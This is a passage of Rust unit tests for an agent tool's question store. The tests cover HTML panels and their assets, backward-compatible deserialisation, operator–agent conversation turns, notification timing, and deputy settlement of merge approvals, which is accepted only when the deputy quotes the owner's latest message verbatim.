2684        // test that actually produced eight mebibytes would only be slower.
2685        let big = dir.path().join("recording.png");
2686        std::fs::File::create(&big)
2687            .unwrap()
2688            .set_len(PANEL_MAX_BYTES)
2689            .unwrap();
2690
2691        let html = "<p>see the recording</p>";
2692        let total = PANEL_MAX_BYTES + html.len() as u64;
2693        let e = s.put_panel(&mut q, html, &[big]).unwrap_err().to_string();
2694        assert!(
2695            e.contains(&PANEL_MAX_BYTES.to_string()),
2696            "the cap is named so the agent knows the limit: {e}"
2697        );
2698        assert!(
2699            e.contains(&total.to_string()),
2700            "the actual size is named so the agent knows by how much: {e}"
2701        );
2702
2703        assert!(!q.panel);
2704        assert!(q.assets.is_empty());
2705        let left: Vec<String> = std::fs::read_dir(s.root())
2706            .unwrap()
2707            .map(|e| e.unwrap().file_name().to_string_lossy().into_owned())
2708            .collect();
2709        assert_eq!(
2710            left,
2711            [format!("{}.json", q.id)],
2712            "a refused panel leaves neither a directory nor scratch: {left:?}"
2713        );
2714    }
2715
2716    #[test]
2717    fn two_assets_sharing_a_base_name_are_refused_rather_than_one_hiding_the_other() {
2718        let (dir, s) = store();
2719        let (before, after) = (dir.path().join("before"), dir.path().join("after"));
2720        std::fs::create_dir_all(&before).unwrap();
2721        std::fs::create_dir_all(&after).unwrap();
2722        std::fs::write(before.join("diff.png"), "before").unwrap();
2723        std::fs::write(after.join("diff.png"), "after").unwrap();
2724
2725        let mut q = panelled();
2726        let e = s
2727            .put_panel(
2728                &mut q,
2729                "<p>x</p>",
2730                &[before.join("diff.png"), after.join("diff.png")],
2731            )
2732            .unwrap_err()
2733            .to_string();
2734        assert!(e.contains("diff.png"), "{e}");
2735        assert!(
2736            e.contains("before") && e.contains("after"),
2737            "both sources are named, because the fix is to rename one: {e}"
2738        );
2739        assert!(!q.panel);
2740        assert!(!s.panel_dir(&q.id).exists());
2741    }
2742
2743    #[test]
2744    fn storing_a_panel_twice_replaces_it_rather_than_merging_two_attempts() {
2745        let (dir, s) = store();
2746        std::fs::write(dir.path().join("old.png"), "old").unwrap();
2747        std::fs::write(dir.path().join("new.png"), "new").unwrap();
2748
2749        let mut q = panelled();
2750        s.put_panel(&mut q, "<p>first</p>", &[dir.path().join("old.png")])
2751            .unwrap();
2752        s.put_panel(&mut q, "<p>second</p>", &[dir.path().join("new.png")])
2753            .unwrap();
2754
2755        assert_eq!(q.assets, ["new.png"]);
2756        assert_eq!(s.panel_html(&q.id).as_deref(), Some("<p>second</p>"));
2757        assert!(
2758            s.panel_asset(&q.id, "old.png").unwrap().is_none(),
2759            "an asset from the first attempt would show a mix of two answers"
2760        );
2761
2762        s.drop_panel(&q.id).unwrap();
2763        assert!(s.panel_html(&q.id).is_none());
2764        assert!(!s.panel_dir(&q.id).exists());
2765        s.drop_panel(&q.id)
2766            .expect("dropping a panel that is already gone is the desired state");
2767    }
2768
2769    #[test]
2770    fn a_question_with_no_panel_reports_none_rather_than_an_error() {
2771        let (_dir, s) = store();
2772        let mut q = panelled();
2773        s.put(&mut q).unwrap();
2774
2775        assert!(!q.panel);
2776        assert!(s.panel_html(&q.id).is_none());
2777        assert!(
2778            s.panel_asset(&q.id, "diff.svg").unwrap().is_none(),
2779            "a missing file is a 404 for the caller, not a failure of the store"
2780        );
2781        let json = serde_json::to_value(&q).unwrap();
2782        assert_eq!(json["panel"], false);
2783        assert_eq!(json["assets"], serde_json::json!([]));
2784
2785        // And an empty panel is refused, because an empty frame reads to the
2786        // owner as "the agent had nothing to say".
2787        let e = s.put_panel(&mut q, "  \n", &[]).unwrap_err().to_string();
2788        assert!(e.contains("empty panel"), "{e}");
2789        assert!(!s.panel_dir(&q.id).exists());
2790    }
2791
2792    #[test]
2793    fn a_question_written_before_panels_existed_still_deserialises() {
2794        let (_dir, s) = store();
2795        std::fs::create_dir_all(s.root()).unwrap();
2796        let id = "20260902-231501-ab12";
2797        // Byte for byte what an older magi wrote: no `panel`, no `assets`.
2798        let body = r#"{
2799  "schema": 1,
2800  "id": "20260902-231501-ab12",
2801  "run": "20260902-201256-9fb7",
2802  "node": "implement",
2803  "seat": "impl-A",
2804  "summary": "Which storage backend should the cache use?",
2805  "detail": "Both are already dependencies.",
2806  "choices": ["SQLite", "Redis"],
2807  "status": "open",
2808  "asked_at": "2026-09-02T23:15:01Z",
2809  "answered_at": null,
2810  "answer": null
2811}"#;
2812        std::fs::write(s.path_of(id), body).unwrap();
2813
2814        let q = s.get(id).unwrap();
2815        assert!(
2816            !q.panel,
2817            "an absent field means no panel, not a parse error"
2818        );
2819        assert!(q.assets.is_empty());
2820        // Schema 1 predates `thread` entirely - not merely predates it having
2821        // any turns - and this build now speaks schema 3. Reading it must not
2822        // be an error: `q.schema > SCHEMA` is false for 1 > 3, so the file is
2823        // accepted and the missing field defaults to no conversation yet.
2824        assert_eq!(q.schema, 1);
2825        assert!(q.thread.is_empty());
2826        assert_eq!(
2827            q.answer_timeout, 0,
2828            "an absent field means unrecorded, not a zero-second deadline"
2829        );
2830        assert!(!q.waiting_on_agent());
2831        assert_eq!(q.summary, "Which storage backend should the cache use?");
2832        assert_eq!(
2833            s.list().len(),
2834            1,
2835            "and it is still listed; skipping it would hide an open question"
2836        );
2837    }
2838
2839    fn turn(who: Who, body: &str, at: Timestamp) -> Turn {
2840        Turn {
2841            who,
2842            body: body.to_owned(),
2843            at,
2844            note: None,
2845        }
2846    }
2847
2848    #[test]
2849    fn a_turn_round_trips_as_who_body_at_with_two_named_speakers() {
2850        // The phone reads this shape by hand, same as the question itself: a
2851        // rename here is a card that silently drops every message in it.
2852        let mut q = choice_question();
2853        q.thread
2854            .push(turn(Who::Operator, "why not Postgres?", Timestamp::now()));
2855        let value = serde_json::to_value(&q.thread[0]).unwrap();
2856        let mut keys: Vec<&str> = value
2857            .as_object()
2858            .unwrap()
2859            .keys()
2860            .map(String::as_str)
2861            .collect();
2862        keys.sort_unstable();
2863        assert_eq!(keys, ["at", "body", "who"]);
2864        assert_eq!(value["who"], "operator");
2865        assert_eq!(value["body"], "why not Postgres?");
2866
2867        let agent_turn = serde_json::json!({"who": "agent", "body": "hi", "at": value["at"]});
2868        let parsed: Turn = serde_json::from_value(agent_turn).unwrap();
2869        assert_eq!(parsed.who, Who::Agent);
2870    }
2871
2872    fn approval_question() -> Question {
2873        let mut q = Question::new(
2874            "run".into(),
2875            crate::land::APPROVAL_NODE.into(),
2876            "land".into(),
2877            "Merge?".into(),
2878            String::new(),
2879            vec!["merge".into(), "hold".into()],
2880        );
2881        let mut dep = Deputy::new("brief".into());
2882        dep.seat = Some(crate::agent::SeatState::new("deputy-x", "alpha", 1));
2883        q.deputy = Some(dep);
2884        q
2885    }
2886
2887    #[test]
2888    fn a_merge_approval_settles_on_a_verbatim_quote_of_the_latest_message() {
2889        let mut q = approval_question();
2890        q.say("merge").unwrap();
2891        q.reply("sure?", vec!["merge".into(), "hold".into()])
2892            .unwrap();
2893        q.say(" Merge it please ").unwrap();
2894        assert!(
2895            q.settle_by_deputy("deputy-x", "merge", "   ", None)
2896                .is_err(),
2897            "an empty quote is refused"
2898        );
2899        assert!(
2900            q.settle_by_deputy("deputy-x", "merge", "ship it", None)
2901                .is_err(),
2902            "a quote the owner never said is refused"
2903        );
2904        assert_eq!(q.status, QuestionStatus::Open);
2905        q.settle_by_deputy("deputy-x", "merge", "Merge it please", None)
2906            .unwrap();
2907        assert_eq!(q.resolution().as_deref(), Some("merge"));
2908    }
2909
2910    #[test]
2911    fn a_local_release_approval_is_held_to_the_merge_rules_but_an_escalation_is_not() {
2912        let mk = |choices: Vec<String>| {
2913            let mut q = Question::new(
2914                String::new(),
2915                crate::bump::NOTICE_NODE.into(),
2916                "release-watch".into(),
2917                "Release?".into(),
2918                String::new(),
2919                choices,
2920            );
2921            let mut dep = Deputy::new("brief".into());
2922            dep.seat = Some(crate::agent::SeatState::new("deputy-x", "alpha", 1));
2923            q.deputy = Some(dep);
2924            q
2925        };
2926        let mut approval = mk(vec!["merge".into(), "hold".into()]);
2927        assert!(crate::deputy::merge_gated(&approval));
2928        approval.say("マージしていいよ").unwrap();
2929        assert!(
2930            approval
2931                .settle_by_deputy("deputy-x", "merge", "ぜひマージして", None)
2932                .is_err(),
2933            "a quote the owner never said is refused"
2934        );
2935        approval
2936            .settle_by_deputy("deputy-x", "merge", "マージしていいよ", None)
2937            .unwrap();
2938
2939        let mut esc = mk(vec!["rerun again".into(), "hold".into(), "leave it".into()]);
2940        assert!(!crate::deputy::merge_gated(&esc));
2941        esc.say("もう監視はいらない").unwrap();
2942        esc.settle_by_deputy("deputy-x", "leave it", "監視はいらない", None)
2943            .unwrap();
2944        assert_eq!(esc.resolution().as_deref(), Some("leave it"));
2945    }
2946
2947    #[test]
2948    fn a_merge_among_other_requests_settles_but_hold_needs_the_whole_message() {
2949        let mut q = approval_question();
2950        q.say("マージしていいよ。残りのレビュー指摘はフォローアップタスクとして積んで")
2951            .unwrap();
2952        assert!(
2953            q.settle_by_deputy("deputy-x", "merge", "どこかの言葉", None)
2954                .is_err(),
2955            "the quote must be the owner's"
2956        );
2957        assert!(
2958            q.settle_by_deputy("deputy-x", "hold", "マージしていいよ", None)
2959                .is_err(),
2960            "`hold` still needs the whole message"
2961        );
2962        q.settle_by_deputy("deputy-x", "merge", "マージしていいよ", None)
2963            .unwrap();
2964        assert_eq!(q.resolution().as_deref(), Some("merge"));
2965    }
2966
2967    fn settle_ready() -> Question {
2968        let mut q = Question::new(
2969            "task".to_owned(),
2970            "conduct".to_owned(),
2971            "conduct".to_owned(),
2972            "Done?".to_owned(),
2973            String::new(),
2974            vec!["yes".to_owned(), "no".to_owned()],
2975        );
2976        let mut seat = crate::agent::SeatState::new("deputy-x", "alpha", 1);
2977        seat.turns = 1;
2978        let mut dep = Deputy::new("brief".to_owned());
2979        dep.seat = Some(seat);
2980        q.deputy = Some(dep);
2981        q.say("setup done, and file a follow-up").unwrap();
2982        q
2983    }
2984
2985    #[test]
2986    fn a_settle_note_is_stored_on_the_turn_through_update_and_reads_back() {
2987        let dir = tempfile::TempDir::new().unwrap();
2988        let store = Questions::at(dir.path().join("questions"));
2989        let mut q = settle_ready();
2990        let id = q.id.clone();
2991        store.put(&mut q).unwrap();
2992        store
2993            .update(&id, |q| {
2994                q.settle_by_deputy(
2995                    "deputy-x",
2996                    "yes",
2997                    "setup done",
2998                    Some("  no follow-up was queued  "),
2999                )
3000            })
3001            .unwrap();
3002        let back = store.get(&id).unwrap();
3003        let turn = back.thread.last().unwrap();
3004        assert_eq!(turn.who, Who::Agent);
3005        assert!(turn.body.starts_with("Settled as `yes`"));
3006        assert_eq!(turn.note.as_deref(), Some("no follow-up was queued"));
3007        assert_eq!(back.thread[0].note, None);
3008    }
3009
3010    #[test]
3011    fn an_empty_or_blank_settle_note_is_no_note() {
3012        for note in [None, Some(""), Some("  \n ")] {
3013            let mut q = settle_ready();
3014            q.settle_by_deputy("deputy-x", "yes", "setup done", note)
3015                .unwrap();
3016            assert_eq!(q.thread.last().unwrap().note, None, "{note:?}");
3017            let json = serde_json::to_string(&q).unwrap();
3018            assert!(!json.contains("\"note\""), "no key when there is none");
3019        }
3020    }
3021
3022    #[test]
3023    fn a_refused_settle_leaves_no_note_behind() {
3024        let mut q = settle_ready();
3025        let before = q.thread.clone();
3026        assert!(
3027            q.settle_by_deputy("deputy-x", "yes", "never said this", Some("n"))
3028                .is_err()
3029        );
3030        assert!(
3031            q.settle_by_deputy("someone-else", "yes", "setup done", Some("n"))
3032                .is_err()
3033        );
3034        assert_eq!(q.thread, before);
3035        assert_eq!(q.status, QuestionStatus::Open);
3036    }
3037
3038    #[test]
3039    fn a_turn_written_before_notes_existed_still_reads() {
3040        let t: Turn =
3041            serde_json::from_str(r#"{"who":"agent","body":"old","at":"2026-01-01T00:00:00Z"}"#)
3042                .unwrap();
3043        assert_eq!(t.note, None);
3044    }
3045
3046    #[test]
3047    fn a_quote_from_an_earlier_owner_message_does_not_settle_a_merge() {
3048        let mut q = approval_question();
3049        q.say("merge").unwrap();
3050        q.reply("sure?", vec!["merge".into(), "hold".into()])
3051            .unwrap();
3052        q.say("wait, hold off").unwrap();
3053        assert!(
3054            q.settle_by_deputy("deputy-x", "merge", "merge", None)
3055                .is_err()
3056        );
3057        assert_eq!(q.status, QuestionStatus::Open);
3058    }
3059
3060    #[test]
3061    fn a_deputy_settles_only_on_an_offered_choice_and_the_owners_own_words() {
3062        let mut q = Question::new(
3063            "task".to_owned(),
3064            "conduct".to_owned(),
3065            "conduct".to_owned(),
3066            "Done?".to_owned(),
3067            String::new(),
3068            vec!["yes".to_owned(), "no".to_owned()],
3069        );
3070        let mut seat = crate::agent::SeatState::new("deputy-x", "alpha", 1);
3071        seat.turns = 1;
3072        let mut dep = Deputy::new("brief".to_owned());
3073        dep.seat = Some(seat);
3074        q.deputy = Some(dep);
3075        q.say("setup done, go ahead").unwrap();
3076
3077        assert!(
3078            q.settle_by_deputy("someone-else", "yes", "setup done", None)
3079                .is_err()
3080        );
3081        assert!(
3082            q.settle_by_deputy("deputy-x", "maybe", "setup done", None)
3083                .is_err()
3084        );
3085        assert!(
3086            q.settle_by_deputy("deputy-x", "yes", "never said this", None)
3087                .is_err()
3088        );
3089        assert!(q.settle_by_deputy("deputy-x", "yes", "  ", None).is_err());
3090        assert_eq!(q.status, QuestionStatus::Open);
3091
3092        q.settle_by_deputy("deputy-x", "yes", "setup done", None)
3093            .unwrap();
3094        assert_eq!(q.status, QuestionStatus::Answered);
3095        assert_eq!(q.resolution().as_deref(), Some("yes"));
3096        let last = q.thread.last().unwrap();
3097        assert_eq!(last.who, Who::Agent);
3098        assert!(
3099            last.body.contains("setup done"),
3100            "the quote stays on the record"
3101        );
3102    }
3103
3104    #[test]
3105    fn a_question_written_before_deputies_still_reads() {
3106        let mut q = Question::new(
3107            "task".to_owned(),
3108            "conduct".to_owned(),
3109            "conduct".to_owned(),
3110            "Done?".to_owned(),
3111            String::new(),
3112            Vec::new(),
3113        );
3114        q.schema = 4;
3115        let mut v = serde_json::to_value(&q).unwrap();
3116        v.as_object_mut().unwrap().remove("deputy");
3117        let back: Question = serde_json::from_value(v).unwrap();
3118        assert!(back.deputy.is_none());
3119    }
3120
3121    #[test]
3122    fn saying_something_appends_an_operator_turn_without_deciding_anything() {
3123        let mut q = choice_question();
3124        q.say("does the cache need eviction?").unwrap();
3125        assert_eq!(q.thread.len(), 1);
3126        assert_eq!(q.thread[0].who, Who::Operator);
3127        assert_eq!(q.thread[0].body, "does the cache need eviction?");
3128        // Speaking is not deciding: the status and the answer are untouched,
3129        // which is the whole point of the round trip existing at all.
3130        assert_eq!(q.status, QuestionStatus::Open);
3131        assert!(q.answer.is_none());
3132        assert!(q.waiting_on_agent(), "the ball is now in the agent's court");
3133    }
3134
3135    #[test]
3136    fn saying_and_replying_are_refused_on_a_settled_question_and_on_empty_text() {
3137        let mut answered = choice_question();
3138        answered
3139            .answer(Answer::Choice("SQLite".to_owned()))
3140            .unwrap();
3141        let a = answered.say("still there?").unwrap_err().to_string();
3142        assert!(a.contains("already answered"), "{a}");
3143        let b = answered
3144            .reply("still there?", vec![])
3145            .unwrap_err()
3146            .to_string();
3147        assert!(b.contains("already answered"), "{b}");
3148
3149        let mut abandoned = choice_question();
3150        abandoned.abandon("timed out");
3151        let c = abandoned.say("hello?").unwrap_err().to_string();
3152        assert!(c.contains("abandoned"), "{c}");
3153
3154        let mut open = choice_question();
3155        let d = open.say("   ").unwrap_err().to_string();
3156        assert!(d.contains("empty"), "{d}");
3157        let e = open.reply("  \n", vec![]).unwrap_err().to_string();
3158        assert!(e.contains("empty"), "{e}");
3159        assert!(open.thread.is_empty(), "a refused turn leaves no trace");
3160    }
3161
3162    #[test]
3163    fn a_reply_replaces_the_choices_and_moves_the_ball_back_to_the_owner() {
3164        let mut q = choice_question();
3165        q.say("SQLite or Redis, but what about disk space?")
3166            .unwrap();
3167        assert!(q.waiting_on_agent());
3168
3169        q.reply(
3170            "SQLite: it is one file, no server to run.",
3171            vec!["SQLite".to_owned()],
3172        )
3173        .unwrap();
3174
3175        assert_eq!(q.choices, ["SQLite"]);
3176        assert!(
3177            !q.waiting_on_agent(),
3178            "the agent spoke, so the owner is the one being waited on now"
3179        );
3180        assert_eq!(q.thread.len(), 2);
3181        assert_eq!(q.thread[1].who, Who::Agent);
3182
3183        // The new choice set is what a subsequent answer is checked against.
3184        assert!(q.answer(Answer::Choice("Redis".to_owned())).is_err());
3185        q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3186        assert_eq!(q.resolution().as_deref(), Some("SQLite"));
3187    }
3188
3189    #[test]
3190    fn notification_fires_for_the_first_ask_and_only_after_the_quiet_window_on_a_reply() {
3191        let mut fresh = choice_question();
3192        assert!(
3193            fresh.should_notify(Timestamp::now()),
3194            "nobody has been notified yet, so the first ask always pages"
3195        );
3196
3197        fresh.say("why not Postgres?").unwrap();
3198        let just_said = fresh.thread[0].at;
3199        assert!(
3200            !fresh.should_notify(just_said + jiff::SignedDuration::from_secs(60)),
3201            "still on the screen a minute later; no need to page again"
3202        );
3203        assert!(
3204            !fresh.should_notify(just_said + jiff::SignedDuration::from_secs(300)),
3205            "exactly the window: `>` means this side stays quiet"
3206        );
3207        assert!(
3208            fresh.should_notify(just_said + jiff::SignedDuration::from_secs(301)),
3209            "past the window: they may have walked away"
3210        );
3211    }
3212
3213    #[test]
3214    fn a_round_trip_of_turns_still_counts_as_one_open_question() {
3215        let (_dir, s) = store();
3216        let mut q = choice_question();
3217        s.put(&mut q).unwrap();
3218        q.say("why not Postgres?").unwrap();
3219        s.put(&mut q).unwrap();
3220        q.reply("no server to run", vec!["SQLite".to_owned()])
3221            .unwrap();
3222        s.put(&mut q).unwrap();
3223
3224        assert_eq!(
3225            s.count_open(),
3226            1,
3227            "one question that talked twice is still one open question"
3228        );
3229        assert_eq!(s.open_for(&q.run).len(), 1);
3230    }
3231
3232    #[tokio::test]
3233    async fn the_wait_returns_to_the_caller_when_the_owner_talks_back_without_deciding() {
3234        let (dir, s) = store();
3235        let mut q = choice_question();
3236        let id = q.id.clone();
3237        let writer = Questions::at(dir.path().join("questions"));
3238        let handle = tokio::spawn(async move {
3239            tokio::time::sleep(Duration::from_millis(30)).await;
3240            let mut fresh = writer.get(&id).expect("the question was filed first");
3241            fresh.say("why not Postgres?").unwrap();
3242            writer.put(&mut fresh).unwrap();
3243        });
3244
3245        let got = wait_for_owner(
3246            &mut q,
3247            &s,
3248            &quiet(),
3249            Duration::from_secs(5),
3250            Duration::from_millis(10),
3251        )
3252        .await
3253        .unwrap();
3254
3255        handle.await.unwrap();
3256        assert_eq!(got, Wait::Replied("why not Postgres?".to_owned()));
3257        assert_eq!(
3258            q.status,
3259            QuestionStatus::Open,
3260            "talking back is not a decision; the question stays open"
3261        );
3262        assert!(q.answer.is_none());
3263    }
3264
3265    #[test]
3266    fn a_say_that_lands_before_the_agents_reply_stays_unread() {
3267        let mut q = choice_question();
3268        q.say("A").unwrap();
3269        q.delivered_turns = q.thread.len();
3270        q.say("B").unwrap();
3271        q.reply("about A", vec![]).unwrap();
3272        assert_eq!(q.unread_from_owner().as_deref(), Some("B"));
3273        q.delivered_turns = q.thread.len();
3274        assert_eq!(q.unread_from_owner(), None);
3275    }
3276
3277    #[test]
3278    fn a_say_before_the_answer_is_handed_over_ahead_of_it() {
3279        let (_d, s) = store();
3280        let mut q = choice_question();
3281        s.put(&mut q).unwrap();
3282        q.say("first").unwrap();
3283        q.say("second").unwrap();
3284        q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3285        s.put(&mut q).unwrap();
3286        assert_eq!(q.unread_from_owner(), None, "closed: the guard stays");
3287        let mut out = Vec::new();
3288        deliver_answer(&s, &mut q, "SQLite", &mut out).unwrap();
3289        let shown = String::from_utf8(out).unwrap();
3290        let (a, b, c) = (
3291            shown.find("first").unwrap(),
3292            shown.find("second").unwrap(),
3293            shown.find("SQLite").unwrap(),
3294        );
3295        assert!(a < b && b < c, "{shown}");
3296        assert_eq!(q.delivered_turns, q.thread.len());
3297        assert!(q.answer_delivered);
3298    }
3299
3300    #[test]
3301    fn an_answer_alone_is_unchanged_and_delivered_says_are_not_repeated() {
3302        let mut q = choice_question();
3303        q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3304        assert_eq!(answer_for_agent(&q, "SQLite"), "SQLite");
3305        let mut q = choice_question();
3306        q.say("old").unwrap();
3307        q.delivered_turns = q.thread.len();
3308        q.say("new").unwrap();
3309        q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3310        let shown = answer_for_agent(&q, "SQLite");
3311        assert!(shown.contains("new") && !shown.contains("old"), "{shown}");
3312    }
3313
3314    #[test]
3315    fn action_specs_parse_strictly_and_must_name_an_offered_choice() {
3316        let choices = vec!["resume で続行する".to_owned(), "wait".to_owned()];
3317        let ok = parse_actions(
3318            &[
3319                "resume で続行する=resume".to_owned(),
3320                "wait=done".to_owned(),
3321            ],
3322            &choices,
3323            "run-1",
3324        )
3325        .unwrap();
3326        assert_eq!(
3327            ok["resume で続行する"],
3328            ChoiceAction::Resume {
3329                run: "run-1".into()
3330            }
3331        );
3332        assert_eq!(ok["wait"], ChoiceAction::Done);
3333
3334        let named = ChoiceAction::parse("x=resume:abcd", "").unwrap();
3335        assert_eq!(named.1, ChoiceAction::Resume { run: "abcd".into() });
3336        assert_eq!(
3337            ChoiceAction::parse("x=requeue", "").unwrap().1,
3338            ChoiceAction::Requeue
3339        );
3340
3341        for bad in [
3342            "no-equals",
3343            "=done",
3344            "x=resume",
3345            "x=resume:",
3346            "x=explode",
3347            "x=done:1",
3348        ] {
3349            assert!(ChoiceAction::parse(bad, "").is_err(), "{bad}");
3350        }
3351        assert!(parse_actions(&["ghost=done".to_owned()], &choices, "").is_err());
3352        assert!(
3353            parse_actions(
3354                &["wait=done".to_owned(), "wait=requeue".to_owned()],
3355                &choices,
3356                ""
3357            )
3358            .is_err()
3359        );
3360    }
3361
3362    #[test]
3363    fn only_a_chosen_label_with_an_action_is_actionable() {
3364        let mut q = choice_question();
3365        q.choices = vec!["resume".to_owned(), "SQLite".to_owned()];
3366        q.actions.insert("SQLite".to_owned(), ChoiceAction::Requeue);
3367        assert!(q.chosen_action().is_none(), "unanswered");
3368        q.answer(Answer::Choice("resume".to_owned())).unwrap();
3369        assert!(
3370            q.chosen_action().is_none(),
3371            "a label that merely reads like an action does nothing"
3372        );
3373
3374        let mut q2 = choice_question();
3375        q2.choices = vec!["SQLite".to_owned()];
3376        q2.actions
3377            .insert("SQLite".to_owned(), ChoiceAction::Requeue);
3378        q2.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3379        assert_eq!(q2.chosen_action(), Some(&ChoiceAction::Requeue));
3380    }
3381
3382    #[test]
3383    fn a_reply_drops_actions_whose_choice_is_gone_and_old_files_read_without_actions() {
3384        let mut q = choice_question();
3385        q.choices = vec!["A".to_owned(), "B".to_owned()];
3386        q.actions.insert("A".to_owned(), ChoiceAction::Done);
3387        q.actions.insert("B".to_owned(), ChoiceAction::Requeue);
3388        q.reply("narrowing", vec!["B".to_owned()]).unwrap();
3389        assert_eq!(q.actions.len(), 1);
3390        assert!(q.actions.contains_key("B"));
3391
3392        let mut v = serde_json::to_value(&q).unwrap();
3393        v.as_object_mut().unwrap().remove("actions");
3394        let old: Question = serde_json::from_value(v).unwrap();
3395        assert!(old.actions.is_empty());
3396    }
3397}